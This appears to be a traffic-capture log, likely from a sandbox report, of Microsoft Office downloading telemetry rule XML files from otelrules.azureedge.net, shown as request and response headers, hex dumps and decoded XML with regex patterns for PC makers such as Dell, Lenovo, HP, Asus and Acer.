                                                                                                                                                                                                2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095418Z-r1d97b99577ckpmjhC1TEBrzs000000008r000000000842e
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:18 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                6192.168.2.74971013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:19 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                x-ms-request-id: bfe6cc7a-201e-006e-7e8c-3abbe3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095419Z-1777c6cb754rz2pghC1TEBghen000000099000000000bue9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                7192.168.2.74970913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:19 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095419Z-185f5d8b95csp6jmhC1NYCwy6s00000009zg00000000bbuf
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:19 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                8192.168.2.74971313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:19 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 467
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095419Z-1777c6cb754gc8g6hC1TEB966c00000009b000000000dkx1
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:19 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                9192.168.2.74971213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:19 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 632
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                x-ms-request-id: 70a275ef-201e-0051-048c-3a7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095419Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a4000000000dgtv
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:19 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                10192.168.2.74971113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:19 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095419Z-r1d97b9957789g82hC1TEBstx000000008hg00000000dztg
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                11192.168.2.74971413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:20 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                x-ms-request-id: 79148a84-101e-0017-578c-3a47c7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095420Z-r1d97b99577tssmjhC1TEB8kan00000008fg00000000ekq4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                12192.168.2.74971613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:20 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095420Z-r1d97b99577mrt4rhC1TEBftkc00000008p00000000031rp
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                13192.168.2.74971813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:20 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095420Z-1777c6cb754mrj2shC1TEB6k7w00000009n000000000355f
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                14192.168.2.74971713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:20 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095420Z-185f5d8b95crl6swhC1NYC3ueg0000000a4000000000eckp
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


